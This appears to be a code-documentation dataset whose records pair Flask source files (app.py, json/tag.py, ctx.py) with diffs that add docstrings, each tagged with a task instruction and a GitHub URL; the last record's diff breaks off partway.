+ ``HTTPException`` subclasses can be handled with a catch-all
+ handler for the base ``HTTPException``.
+
+ .. versionadded:: 0.3
+ """
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
@@ -520,6 +865,20 @@ def handle_user_exception(
self, ctx: AppContext, e: Exception
) -> HTTPException | ft.ResponseReturnValue:
+ """This method is called whenever an exception occurs that
+ should be handled. A special case is :class:`~werkzeug
+ .exceptions.HTTPException` which is forwarded to the
+ :meth:`handle_http_exception` method. This function will either
+ return a response value or reraise the exception with the same
+ traceback.
+
+ .. versionchanged:: 1.0
+ Key errors raised from request data like ``form`` show the
+ bad key in debug mode rather than a generic bad request
+ message.
+
+ .. versionadded:: 0.7
+ """
if isinstance(e, BadRequestKeyError) and (
self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]
):
@@ -536,6 +895,33 @@ return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_exception(self, ctx: AppContext, e: Exception) -> Response:
+ """Handle an exception that did not have an error handler
+ associated with it, or that was raised from an error handler.
+ This always causes a 500 ``InternalServerError``.
+
+ Always sends the :data:`got_request_exception` signal.
+
+ If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug
+ mode, the error will be re-raised so that the debugger can
+ display it. Otherwise, the original exception is logged, and
+ an :exc:`~werkzeug.exceptions.InternalServerError` is returned.
+
+ If an error handler is registered for ``InternalServerError`` or
+ ``500``, it will be used. For consistency, the handler will
+ always receive the ``InternalServerError``. The original
+ unhandled exception is available as ``e.original_exception``.
+
+ .. versionchanged:: 1.1.0
+ Always passes the ``InternalServerError`` instance to the
+ handler, setting ``original_exception`` to the unhandled
+ error.
+
+ .. versionchanged:: 1.1.0
+ ``after_request`` functions and other finalization is done
+ even for the default 500 response when there is no handler.
+
+ .. versionadded:: 0.3
+ """
exc_info = sys.exc_info()
got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e)
propagate = self.config["PROPAGATE_EXCEPTIONS"]
@@ -566,11 +952,27 @@ ctx: AppContext,
exc_info: tuple[type, BaseException, TracebackType] | tuple[None, None, None],
) -> None:
+ """Logs an exception. This is called by :meth:`handle_exception`
+ if debugging is disabled and right before the handler is called.
+ The default implementation logs the exception as error on the
+ :attr:`logger`.
+
+ .. versionadded:: 0.8
+ """
self.logger.error(
f"Exception on {ctx.request.path} [{ctx.request.method}]", exc_info=exc_info
)
def dispatch_request(self, ctx: AppContext) -> ft.ResponseReturnValue:
+ """Does the request dispatching. Matches the URL and returns the
+ return value of the view or error handler. This does not have to
+ be a response object. In order to convert the return value to a
+ proper response object, call :func:`make_response`.
+
+ .. versionchanged:: 0.7
+ This no longer does the exception handling, this code was
+ moved to the new :meth:`full_dispatch_request`.
+ """
req = ctx.request
if req.routing_exception is not None:
@@ -588,6 +990,12 @@ return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
def full_dispatch_request(self, ctx: AppContext) -> Response:
+ """Dispatches the request and on top of that performs request
+ pre and postprocessing as well as HTTP exception catching and
+ error handling.
+
+ .. versionadded:: 0.7
+ """
if not self._got_first_request and self.should_ignore_error is not None:
import warnings
@@ -616,6 +1024,18 @@ rv: ft.ResponseReturnValue | HTTPException,
from_error_handler: bool = False,
) -> Response:
+ """Given the return value from a view function this finalizes
+ the request by converting it into a response and invoking the
+ postprocessing functions. This is invoked for both normal
+ request dispatching as well as error handlers.
+
+ Because this means that it might be called as a result of a
+ failure a special safe mode is available which can be enabled
+ with the `from_error_handler` flag. If enabled, failures in
+ response processing will be logged and otherwise ignored.
+
+ :internal:
+ """
response = self.make_response(rv)
try:
response = self.process_response(ctx, response)
@@ -631,12 +1051,26 @@ return response
def make_default_options_response(self, ctx: AppContext) -> Response:
+ """This method is called to create the default ``OPTIONS`` response.
+ This can be changed through subclassing to change the default
+ behavior of ``OPTIONS`` responses.
+
+ .. versionadded:: 0.7
+ """
methods = ctx.url_adapter.allowed_methods() # type: ignore[union-attr]
rv = self.response_class()
rv.allow.update(methods)
return rv
def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]:
+ """Ensure that the function is synchronous for WSGI workers.
+ Plain ``def`` functions are returned as-is. ``async def``
+ functions are wrapped to run and wait for the response.
+
+ Override this method to change how the app runs async views.
+
+ .. versionadded:: 2.0
+ """
if iscoroutinefunction(func):
return self.async_to_sync(func)
@@ -645,6 +1079,17 @@ def async_to_sync(
self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]]
) -> t.Callable[..., t.Any]:
+ """Return a sync function that will run the coroutine function.
+
+ .. code-block:: python
+
+ result = app.async_to_sync(func)(*args, **kwargs)
+
+ Override this method to change how the app converts async code
+ to be synchronously callable.
+
+ .. versionadded:: 2.0
+ """
try:
from asgiref.sync import async_to_sync as asgiref_async_to_sync
except ImportError:
@@ -665,6 +1110,52 @@ _external: bool | None = None,
**values: t.Any,
) -> str:
+ """Generate a URL to the given endpoint with the given values.
+
+ This is called by :func:`flask.url_for`, and can be called
+ directly as well.
+
+ An *endpoint* is the name of a URL rule, usually added with
+ :meth:`@app.route() <route>`, and usually the same name as the
+ view function. A route defined in a :class:`~flask.Blueprint`
+ will prepend the blueprint's name separated by a ``.`` to the
+ endpoint.
+
+ In some cases, such as email messages, you want URLs to include
+ the scheme and domain, like ``https://example.com/hello``. When
+ not in an active request, URLs will be external by default, but
+ this requires setting :data:`SERVER_NAME` so Flask knows what
+ domain to use. :data:`APPLICATION_ROOT` and
+ :data:`PREFERRED_URL_SCHEME` should also be configured as
+ needed. This config is only used when not in an active request.
+
+ Functions can be decorated with :meth:`url_defaults` to modify
+ keyword arguments before the URL is built.
+
+ If building fails for some reason, such as an unknown endpoint
+ or incorrect values, the app's :meth:`handle_url_build_error`
+ method is called. If that returns a string, that is returned,
+ otherwise a :exc:`~werkzeug.routing.BuildError` is raised.
+
+ :param endpoint: The endpoint name associated with the URL to
+ generate. If this starts with a ``.``, the current blueprint
+ name (if any) will be used.
+ :param _anchor: If given, append this as ``#anchor`` to the URL.
+ :param _method: If given, generate the URL associated with this
+ method for the endpoint.
+ :param _scheme: If given, the URL will have this scheme if it
+ is external.
+ :param _external: If given, prefer the URL to be internal
+ (False) or require it to be external (True). External URLs
+ include the scheme and domain. When not in an active
+ request, URLs are external by default.
+ :param values: Values to use for the variable parts of the URL
+ rule. Unknown keys are appended as query string arguments,
+ like ``?a=b&c=d``.
+
+ .. versionadded:: 2.2
+ Moved from ``flask.url_for``, which calls this method.
+ """
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
url_adapter = ctx.url_adapter
blueprint_name = ctx.request.blueprint
@@ -731,6 +1222,61 @@ return rv
def make_response(self, rv: ft.ResponseReturnValue) -> Response:
+ """Convert the return value from a view function to an instance of
+ :attr:`response_class`.
+
+ :param rv: the return value from the view function. The view function
+ must return a response. Returning ``None``, or the view ending
+ without returning, is not allowed. The following types are allowed
+ for ``view_rv``:
+
+ ``str``
+ A response object is created with the string encoded to UTF-8
+ as the body.
+
+ ``bytes``
+ A response object is created with the bytes as the body.
+
+ ``dict``
+ A dictionary that will be jsonify'd before being returned.
+
+ ``list``
+ A list that will be jsonify'd before being returned.
+
+ ``generator`` or ``iterator``
+ A generator that returns ``str`` or ``bytes`` to be
+ streamed as the response.
+
+ ``tuple``
+ Either ``(body, status, headers)``, ``(body, status)``, or
+ ``(body, headers)``, where ``body`` is any of the other types
+ allowed here, ``status`` is a string or an integer, and
+ ``headers`` is a dictionary or a list of ``(key, value)``
+ tuples. If ``body`` is a :attr:`response_class` instance,
+ ``status`` overwrites the exiting value and ``headers`` are
+ extended.
+
+ :attr:`response_class`
+ The object is returned unchanged.
+
+ other :class:`~werkzeug.wrappers.Response` class
+ The object is coerced to :attr:`response_class`.
+
+ :func:`callable`
+ The function is called as a WSGI application. The result is
+ used to create a response object.
+
+ .. versionchanged:: 2.2
+ A generator will be converted to a streaming response.
+ A list will be converted to a JSON response.
+
+ .. versionchanged:: 1.1
+ A dict will be converted to a JSON response.
+
+ .. versionchanged:: 0.9
+ Previously a tuple was interpreted as the arguments for the
+ response object.
+ """
status: int | None = None
headers: HeadersValue | None = None
@@ -818,6 +1364,15 @@ return rv
def preprocess_request(self, ctx: AppContext) -> ft.ResponseReturnValue | None:
+ """Called before the request is dispatched. Calls
+ :attr:`url_value_preprocessors` registered with the app and the
+ current blueprint (if any). Then calls :attr:`before_request_funcs`
+ registered with the app and the blueprint.
+
+ If any :meth:`before_request` handler returns a non-None value, the
+ value is handled as if it was the return value from the view, and
+ further request handling is stopped.
+ """
req = ctx.request
names = (None, *reversed(req.blueprints))
@@ -837,6 +1392,18 @@ return None
def process_response(self, ctx: AppContext, response: Response) -> Response:
+ """Can be overridden in order to modify the response object
+ before it's sent to the WSGI server. By default this will
+ call all the :meth:`after_request` decorated functions.
+
+ .. versionchanged:: 0.5
+ As of Flask 0.5 the functions registered for after request
+ execution are called in reverse order of registration.
+
+ :param response: a :attr:`response_class` object.
+ :return: a new response object or the same, has to be an
+ instance of :attr:`response_class`.
+ """
for func in ctx._after_request_functions:
response = self.ensure_sync(func)(response)
@@ -853,6 +1420,23 @@ def do_teardown_request(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
+ """Called after the request is dispatched and the response is finalized,
+ right before the request context is popped. Called by
+ :meth:`.AppContext.pop`.
+
+ This calls all functions decorated with :meth:`teardown_request`, and
+ :meth:`Blueprint.teardown_request` if a blueprint handled the request.
+ Finally, the :data:`request_tearing_down` signal is sent.
+
+ :param exc: An unhandled exception raised while dispatching the request.
+ Passed to each teardown function.
+
+ .. versionchanged:: 3.2
+ All callbacks are called rather than stopping on the first error.
+
+ .. versionchanged:: 0.9
+ Added the ``exc`` argument.
+ """
collect_errors = _CollectErrors()
for name in chain(ctx.request.blueprints, (None,)):
@@ -869,6 +1453,20 @@ def do_teardown_appcontext(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
+ """Called right before the application context is popped. Called by
+ :meth:`.AppContext.pop`.
+
+ This calls all functions decorated with :meth:`teardown_appcontext`.
+ Then the :data:`appcontext_tearing_down` signal is sent.
+
+ :param exc: An unhandled exception raised while the context was active.
+ Passed to each teardown function.
+
+ .. versionchanged:: 3.2
+ All callbacks are called rather than stopping on the first error.
+
+ .. versionadded:: 0.9
+ """
collect_errors = _CollectErrors()
for func in reversed(self.teardown_appcontext_funcs):
@@ -881,12 +1479,79 @@ collect_errors.raise_any("Errors during app teardown")
def app_context(self) -> AppContext:
+ """Create an :class:`.AppContext`. When the context is pushed,
+ :data:`.current_app` and :data:`.g` become available.
+
+ A context is automatically pushed when handling each request, and when
+ running any ``flask`` CLI command. Use this as a ``with`` block to
+ manually push a context outside of those situations, such as during
+ setup or testing.
+
+ .. code-block:: python
+
+ with app.app_context():
+ init_db()
+
+ See :doc:`/appcontext`.
+
+ .. versionadded:: 0.9
+ """
return AppContext(self)
def request_context(self, environ: WSGIEnvironment) -> AppContext:
+ """Create an :class:`.AppContext` with request information representing
+ the given WSGI environment. A context is automatically pushed when
+ handling each request. When the context is pushed, :data:`.request`,
+ :data:`.session`, :data:`g:, and :data:`.current_app` become available.
+
+ This method should not be used in your own code. Creating a valid WSGI
+ environ is not trivial. Use :meth:`test_request_context` to correctly
+ create a WSGI environ and request context instead.
+
+ See :doc:`/appcontext`.
+
+ :param environ: A WSGI environment.
+ """
return AppContext.from_environ(self, environ)
def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> AppContext:
+ """Create an :class:`.AppContext` with request information created from
+ the given arguments. When the context is pushed, :data:`.request`,
+ :data:`.session`, :data:`g:, and :data:`.current_app` become available.
+
+ This is useful during testing to run a function that uses request data
+ without dispatching a full request. Use this as a ``with`` block to push
+ a context.
+
+ .. code-block:: python
+
+ with app.test_request_context(...):
+ generate_report()
+
+ See :doc:`/appcontext`.
+
+ Takes the same arguments as Werkzeug's
+ :class:`~werkzeug.test.EnvironBuilder`, with some defaults from
+ the application. See the linked Werkzeug docs for most of the
+ available arguments. Flask-specific behavior is listed here.
+
+ :param path: URL path being requested.
+ :param base_url: Base URL where the app is being served, which
+ ``path`` is relative to. If not given, built from
+ :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`,
+ and :data:`APPLICATION_ROOT`.
+ :param subdomain: Subdomain name to prepend to :data:`SERVER_NAME`.
+ :param url_scheme: Scheme to use instead of
+ :data:`PREFERRED_URL_SCHEME`.
+ :param data: The request body text or bytes,or a dict of form data.
+ :param json: If given, this is serialized as JSON and passed as
+ ``data``. Also defaults ``content_type`` to
+ ``application/json``.
+ :param args: Other positional arguments passed to
+ :class:`~werkzeug.test.EnvironBuilder`.
+ :param kwargs: Other keyword arguments passed to
+ :class:`~werkzeug.test.EnvironBuilder`.
+ """
from .testing import EnvironBuilder
builder = EnvironBuilder(self, *args, **kwargs)
@@ -901,6 +1566,29 @@ def wsgi_app(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
+ """The actual WSGI application. This is not implemented in
+ :meth:`__call__` so that middlewares can be applied without
+ losing a reference to the app object. Instead of doing this::
+
+ app = MyMiddleware(app)
+
+ It's a better idea to do this instead::
+
+ app.wsgi_app = MyMiddleware(app.wsgi_app)
+
+ Then you still have the original application object around and
+ can continue to call methods on it.
+
+ .. versionchanged:: 0.7
+ Teardown events for the request and app contexts are called
+ even if an unhandled error occurs. Other events may not be
+ called depending on when an error occurs during dispatch.
+
+ :param environ: A WSGI environment.
+ :param start_response: A callable accepting a status code,
+ a list of headers, and an optional exception context to
+ start the response.
+ """
ctx = self.request_context(environ)
error: BaseException | None = None
try:
@@ -930,4 +1618,8 @@ def __call__(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
- return self.wsgi_app(environ, start_response)+ """The WSGI server calls the Flask application object as the
+ WSGI application. This calls :meth:`wsgi_app`, which can be
+ wrapped to apply middleware.
+ """
+ return self.wsgi_app(environ, start_response)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/app.py |
Write docstrings for backend logic |
from __future__ import annotations
import typing as t
from base64 import b64decode
from base64 import b64encode
from datetime import datetime
from uuid import UUID
from markupsafe import Markup
from werkzeug.http import http_date
from werkzeug.http import parse_date
from ..json import dumps
from ..json import loads
class JSONTag:
__slots__ = ("serializer",)
#: The tag to mark the serialized object with. If empty, this tag is
#: only used as an intermediate step during tagging.
key: str = ""
def __init__(self, serializer: TaggedJSONSerializer) -> None:
self.serializer = serializer
def check(self, value: t.Any) -> bool:
raise NotImplementedError
def to_json(self, value: t.Any) -> t.Any:
raise NotImplementedError
def to_python(self, value: t.Any) -> t.Any:
raise NotImplementedError
def tag(self, value: t.Any) -> dict[str, t.Any]:
return {self.key: self.to_json(value)}
class TagDict(JSONTag):
__slots__ = ()
key = " di"
def check(self, value: t.Any) -> bool:
return (
isinstance(value, dict)
and len(value) == 1
and next(iter(value)) in self.serializer.tags
)
def to_json(self, value: t.Any) -> t.Any:
key = next(iter(value))
return {f"{key}__": self.serializer.tag(value[key])}
def to_python(self, value: t.Any) -> t.Any:
key = next(iter(value))
return {key[:-2]: value[key]}
class PassDict(JSONTag):
__slots__ = ()
def check(self, value: t.Any) -> bool:
return isinstance(value, dict)
def to_json(self, value: t.Any) -> t.Any:
# JSON objects may only have string keys, so don't bother tagging the
# key here.
return {k: self.serializer.tag(v) for k, v in value.items()}
tag = to_json
class TagTuple(JSONTag):
__slots__ = ()
key = " t"
def check(self, value: t.Any) -> bool:
return isinstance(value, tuple)
def to_json(self, value: t.Any) -> t.Any:
return [self.serializer.tag(item) for item in value]
def to_python(self, value: t.Any) -> t.Any:
return tuple(value)
class PassList(JSONTag):
__slots__ = ()
def check(self, value: t.Any) -> bool:
return isinstance(value, list)
def to_json(self, value: t.Any) -> t.Any:
return [self.serializer.tag(item) for item in value]
tag = to_json
class TagBytes(JSONTag):
__slots__ = ()
key = " b"
def check(self, value: t.Any) -> bool:
return isinstance(value, bytes)
def to_json(self, value: t.Any) -> t.Any:
return b64encode(value).decode("ascii")
def to_python(self, value: t.Any) -> t.Any:
return b64decode(value)
class TagMarkup(JSONTag):
__slots__ = ()
key = " m"
def check(self, value: t.Any) -> bool:
return callable(getattr(value, "__html__", None))
def to_json(self, value: t.Any) -> t.Any:
return str(value.__html__())
def to_python(self, value: t.Any) -> t.Any:
return Markup(value)
class TagUUID(JSONTag):
__slots__ = ()
key = " u"
def check(self, value: t.Any) -> bool:
return isinstance(value, UUID)
def to_json(self, value: t.Any) -> t.Any:
return value.hex
def to_python(self, value: t.Any) -> t.Any:
return UUID(value)
class TagDateTime(JSONTag):
__slots__ = ()
key = " d"
def check(self, value: t.Any) -> bool:
return isinstance(value, datetime)
def to_json(self, value: t.Any) -> t.Any:
return http_date(value)
def to_python(self, value: t.Any) -> t.Any:
return parse_date(value)
class TaggedJSONSerializer:
__slots__ = ("tags", "order")
#: Tag classes to bind when creating the serializer. Other tags can be
#: added later using :meth:`~register`.
default_tags = [
TagDict,
PassDict,
TagTuple,
PassList,
TagBytes,
TagMarkup,
TagUUID,
TagDateTime,
]
def __init__(self) -> None:
self.tags: dict[str, JSONTag] = {}
self.order: list[JSONTag] = []
for cls in self.default_tags:
self.register(cls)
def register(
self,
tag_class: type[JSONTag],
force: bool = False,
index: int | None = None,
) -> None:
tag = tag_class(self)
key = tag.key
if key:
if not force and key in self.tags:
raise KeyError(f"Tag '{key}' is already registered.")
self.tags[key] = tag
if index is None:
self.order.append(tag)
else:
self.order.insert(index, tag)
def tag(self, value: t.Any) -> t.Any:
for tag in self.order:
if tag.check(value):
return tag.tag(value)
return value
def untag(self, value: dict[str, t.Any]) -> t.Any:
if len(value) != 1:
return value
key = next(iter(value))
if key not in self.tags:
return value
return self.tags[key].to_python(value[key])
def _untag_scan(self, value: t.Any) -> t.Any:
if isinstance(value, dict):
# untag each item recursively
value = {k: self._untag_scan(v) for k, v in value.items()}
# untag the dict itself
value = self.untag(value)
elif isinstance(value, list):
# untag each item recursively
value = [self._untag_scan(item) for item in value]
return value
def dumps(self, value: t.Any) -> str:
return dumps(self.tag(value), separators=(",", ":"))
def loads(self, value: str) -> t.Any:
return self._untag_scan(loads(value)) | --- +++ @@ -1,3 +1,45 @@+"""
+Tagged JSON
+~~~~~~~~~~~
+
+A compact representation for lossless serialization of non-standard JSON
+types. :class:`~flask.sessions.SecureCookieSessionInterface` uses this
+to serialize the session data, but it may be useful in other places. It
+can be extended to support other types.
+
+.. autoclass:: TaggedJSONSerializer
+ :members:
+
+.. autoclass:: JSONTag
+ :members:
+
+Let's see an example that adds support for
+:class:`~collections.OrderedDict`. Dicts don't have an order in JSON, so
+to handle this we will dump the items as a list of ``[key, value]``
+pairs. Subclass :class:`JSONTag` and give it the new key ``' od'`` to
+identify the type. The session serializer processes dicts first, so
+insert the new tag at the front of the order since ``OrderedDict`` must
+be processed before ``dict``.
+
+.. code-block:: python
+
+ from flask.json.tag import JSONTag
+
+ class TagOrderedDict(JSONTag):
+ __slots__ = ('serializer',)
+ key = ' od'
+
+ def check(self, value):
+ return isinstance(value, OrderedDict)
+
+ def to_json(self, value):
+ return [[k, self.serializer.tag(v)] for k, v in iteritems(value)]
+
+ def to_python(self, value):
+ return OrderedDict(value)
+
+ app.session_interface.serializer.register(TagOrderedDict, index=0)
+"""
from __future__ import annotations
@@ -16,6 +58,7 @@
class JSONTag:
+ """Base class for defining type tags for :class:`TaggedJSONSerializer`."""
__slots__ = ("serializer",)
@@ -24,22 +67,35 @@ key: str = ""
def __init__(self, serializer: TaggedJSONSerializer) -> None:
+ """Create a tagger for the given serializer."""
self.serializer = serializer
def check(self, value: t.Any) -> bool:
+ """Check if the given value should be tagged by this tag."""
raise NotImplementedError
def to_json(self, value: t.Any) -> t.Any:
+ """Convert the Python object to an object that is a valid JSON type.
+ The tag will be added later."""
raise NotImplementedError
def to_python(self, value: t.Any) -> t.Any:
+ """Convert the JSON representation back to the correct type. The tag
+ will already be removed."""
raise NotImplementedError
def tag(self, value: t.Any) -> dict[str, t.Any]:
+ """Convert the value to a valid JSON type and add the tag structure
+ around it."""
return {self.key: self.to_json(value)}
class TagDict(JSONTag):
+ """Tag for 1-item dicts whose only key matches a registered tag.
+
+ Internally, the dict key is suffixed with `__`, and the suffix is removed
+ when deserializing.
+ """
__slots__ = ()
key = " di"
@@ -115,6 +171,9 @@
class TagMarkup(JSONTag):
+ """Serialize anything matching the :class:`~markupsafe.Markup` API by
+ having a ``__html__`` method to the result of that method. Always
+ deserializes to an instance of :class:`~markupsafe.Markup`."""
__slots__ = ()
key = " m"
@@ -158,6 +217,19 @@
class TaggedJSONSerializer:
+ """Serializer that uses a tag system to compactly represent objects that
+ are not JSON types. Passed as the intermediate serializer to
+ :class:`itsdangerous.Serializer`.
+
+ The following extra types are supported:
+
+ * :class:`dict`
+ * :class:`tuple`
+ * :class:`bytes`
+ * :class:`~markupsafe.Markup`
+ * :class:`~uuid.UUID`
+ * :class:`~datetime.datetime`
+ """
__slots__ = ("tags", "order")
@@ -187,6 +259,19 @@ force: bool = False,
index: int | None = None,
) -> None:
+ """Register a new tag with this serializer.
+
+ :param tag_class: tag class to register. Will be instantiated with this
+ serializer instance.
+ :param force: overwrite an existing tag. If false (default), a
+ :exc:`KeyError` is raised.
+ :param index: index to insert the new tag in the tag order. Useful when
+ the new tag is a special case of an existing tag. If ``None``
+ (default), the tag is appended to the end of the order.
+
+ :raise KeyError: if the tag key is already registered and ``force`` is
+ not true.
+ """
tag = tag_class(self)
key = tag.key
@@ -202,6 +287,7 @@ self.order.insert(index, tag)
def tag(self, value: t.Any) -> t.Any:
+ """Convert a value to a tagged representation if necessary."""
for tag in self.order:
if tag.check(value):
return tag.tag(value)
@@ -209,6 +295,7 @@ return value
def untag(self, value: dict[str, t.Any]) -> t.Any:
+ """Convert a tagged representation back to the original type."""
if len(value) != 1:
return value
@@ -232,7 +319,9 @@ return value
def dumps(self, value: t.Any) -> str:
+ """Tag the value and dump it to a compact JSON string."""
return dumps(self.tag(value), separators=(",", ":"))
def loads(self, value: str) -> t.Any:
- return self._untag_scan(loads(value))+ """Load data from a JSON string and deserialized any tagged objects."""
+ return self._untag_scan(loads(value))
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/tag.py |
Add detailed documentation for each class | from __future__ import annotations
import contextvars
import typing as t
from functools import update_wrapper
from types import TracebackType
from werkzeug.exceptions import HTTPException
from werkzeug.routing import MapAdapter
from . import typing as ft
from .globals import _cv_app
from .helpers import _CollectErrors
from .signals import appcontext_popped
from .signals import appcontext_pushed
if t.TYPE_CHECKING:
import typing_extensions as te
from _typeshed.wsgi import WSGIEnvironment
from .app import Flask
from .sessions import SessionMixin
from .wrappers import Request
# a singleton sentinel value for parameter defaults
_sentinel = object()
class _AppCtxGlobals:
# Define attr methods to let mypy know this is a namespace object
# that has arbitrary attributes.
def __getattr__(self, name: str) -> t.Any:
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name) from None
def __setattr__(self, name: str, value: t.Any) -> None:
self.__dict__[name] = value
def __delattr__(self, name: str) -> None:
try:
del self.__dict__[name]
except KeyError:
raise AttributeError(name) from None
def get(self, name: str, default: t.Any | None = None) -> t.Any:
return self.__dict__.get(name, default)
def pop(self, name: str, default: t.Any = _sentinel) -> t.Any:
if default is _sentinel:
return self.__dict__.pop(name)
else:
return self.__dict__.pop(name, default)
def setdefault(self, name: str, default: t.Any = None) -> t.Any:
return self.__dict__.setdefault(name, default)
def __contains__(self, item: str) -> bool:
return item in self.__dict__
def __iter__(self) -> t.Iterator[str]:
return iter(self.__dict__)
def __repr__(self) -> str:
ctx = _cv_app.get(None)
if ctx is not None:
return f"<flask.g of '{ctx.app.name}'>"
return object.__repr__(self)
def after_this_request(
f: ft.AfterRequestCallable[t.Any],
) -> ft.AfterRequestCallable[t.Any]:
ctx = _cv_app.get(None)
if ctx is None or not ctx.has_request:
raise RuntimeError(
"'after_this_request' can only be used when a request"
" context is active, such as in a view function."
)
ctx._after_request_functions.append(f)
return f
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
def copy_current_request_context(f: F) -> F:
ctx = _cv_app.get(None)
if ctx is None:
raise RuntimeError(
"'copy_current_request_context' can only be used when a"
" request context is active, such as in a view function."
)
ctx = ctx.copy()
def wrapper(*args: t.Any, **kwargs: t.Any) -> t.Any:
with ctx:
return ctx.app.ensure_sync(f)(*args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
def has_request_context() -> bool:
return (ctx := _cv_app.get(None)) is not None and ctx.has_request
def has_app_context() -> bool:
return _cv_app.get(None) is not None
class AppContext:
def __init__(
self,
app: Flask,
*,
request: Request | None = None,
session: SessionMixin | None = None,
) -> None:
self.app = app
"""The application represented by this context. Accessed through
:data:`.current_app`.
"""
self.g: _AppCtxGlobals = app.app_ctx_globals_class()
"""The global data for this context. Accessed through :data:`.g`."""
self.url_adapter: MapAdapter | None = None
"""The URL adapter bound to the request, or the app if not in a request.
May be ``None`` if binding failed.
"""
self._request: Request | None = request
self._session: SessionMixin | None = session
self._flashes: list[tuple[str, str]] | None = None
self._after_request_functions: list[ft.AfterRequestCallable[t.Any]] = []
try:
self.url_adapter = app.create_url_adapter(self._request)
except HTTPException as e:
if self._request is not None:
self._request.routing_exception = e
self._cv_token: contextvars.Token[AppContext] | None = None
"""The previous state to restore when popping."""
self._push_count: int = 0
"""Track nested pushes of this context. Cleanup will only run once the
original push has been popped.
"""
@classmethod
def from_environ(cls, app: Flask, environ: WSGIEnvironment, /) -> te.Self:
request = app.request_class(environ)
request.json_module = app.json
return cls(app, request=request)
@property
def has_request(self) -> bool:
return self._request is not None
def copy(self) -> te.Self:
return self.__class__(
self.app,
request=self._request,
session=self._session,
)
@property
def request(self) -> Request:
if self._request is None:
raise RuntimeError("There is no request in this context.")
return self._request
def _get_session(self) -> SessionMixin:
if self._request is None:
raise RuntimeError("There is no request in this context.")
if self._session is None:
si = self.app.session_interface
self._session = si.open_session(self.app, self.request)
if self._session is None:
self._session = si.make_null_session(self.app)
return self._session
@property
def session(self) -> SessionMixin:
session = self._get_session()
session.accessed = True
return session
def match_request(self) -> None:
try:
result = self.url_adapter.match(return_rule=True) # type: ignore[union-attr]
except HTTPException as e:
self._request.routing_exception = e # type: ignore[union-attr]
else:
self._request.url_rule, self._request.view_args = result # type: ignore[union-attr]
def push(self) -> None:
self._push_count += 1
if self._cv_token is not None:
return
self._cv_token = _cv_app.set(self)
appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync)
if self._request is not None:
# Open the session at the moment that the request context is available.
# This allows a custom open_session method to use the request context.
self._get_session()
# Match the request URL after loading the session, so that the
# session is available in custom URL converters.
if self.url_adapter is not None:
self.match_request()
def pop(self, exc: BaseException | None = None) -> None:
if self._cv_token is None:
raise RuntimeError(f"Cannot pop this context ({self!r}), it is not pushed.")
ctx = _cv_app.get(None)
if ctx is None or self._cv_token is None:
raise RuntimeError(
f"Cannot pop this context ({self!r}), there is no active context."
)
if ctx is not self:
raise RuntimeError(
f"Cannot pop this context ({self!r}), it is not the active"
f" context ({ctx!r})."
)
self._push_count -= 1
if self._push_count > 0:
return
collect_errors = _CollectErrors()
if self._request is not None:
with collect_errors:
self.app.do_teardown_request(self, exc)
with collect_errors:
self._request.close()
with collect_errors:
self.app.do_teardown_appcontext(self, exc)
_cv_app.reset(self._cv_token)
self._cv_token = None
with collect_errors:
appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync)
collect_errors.raise_any("Errors during context teardown")
def __enter__(self) -> te.Self:
self.push()
return self
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_value: BaseException | None,
tb: TracebackType | None,
) -> None:
self.pop(exc_value)
def __repr__(self) -> str:
if self._request is not None:
return (
f"<{type(self).__name__} {id(self)} of {self.app.name},"
f" {self.request.method} {self.request.url!r}>"
)
return f"<{type(self).__name__} {id(self)} of {self.app.name}>"
def __getattr__(name: str) -> t.Any:
import warnings
if name == "RequestContext":
warnings.warn(
"'RequestContext' has merged with 'AppContext', and will be removed"
" in Flask 4.0. Use 'AppContext' instead.",
DeprecationWarning,
stacklevel=2,
)
return AppContext
raise AttributeError(name) | --- +++ @@ -28,6 +28,24 @@
class _AppCtxGlobals:
+ """A plain object. Used as a namespace for storing data during an
+ application context.
+
+ Creating an app context automatically creates this object, which is
+ made available as the :data:`.g` proxy.
+
+ .. describe:: 'key' in g
+
+ Check whether an attribute is present.
+
+ .. versionadded:: 0.10
+
+ .. describe:: iter(g)
+
+ Return an iterator over the attribute names.
+
+ .. versionadded:: 0.10
+ """
# Define attr methods to let mypy know this is a namespace object
# that has arbitrary attributes.
@@ -48,15 +66,40 @@ raise AttributeError(name) from None
def get(self, name: str, default: t.Any | None = None) -> t.Any:
+ """Get an attribute by name, or a default value. Like
+ :meth:`dict.get`.
+
+ :param name: Name of attribute to get.
+ :param default: Value to return if the attribute is not present.
+
+ .. versionadded:: 0.10
+ """
return self.__dict__.get(name, default)
def pop(self, name: str, default: t.Any = _sentinel) -> t.Any:
+ """Get and remove an attribute by name. Like :meth:`dict.pop`.
+
+ :param name: Name of attribute to pop.
+ :param default: Value to return if the attribute is not present,
+ instead of raising a ``KeyError``.
+
+ .. versionadded:: 0.11
+ """
if default is _sentinel:
return self.__dict__.pop(name)
else:
return self.__dict__.pop(name, default)
def setdefault(self, name: str, default: t.Any = None) -> t.Any:
+ """Get the value of an attribute if it is present, otherwise
+ set and return a default value. Like :meth:`dict.setdefault`.
+
+ :param name: Name of attribute to get.
+ :param default: Value to set and return if the attribute is not
+ present.
+
+ .. versionadded:: 0.11
+ """
return self.__dict__.setdefault(name, default)
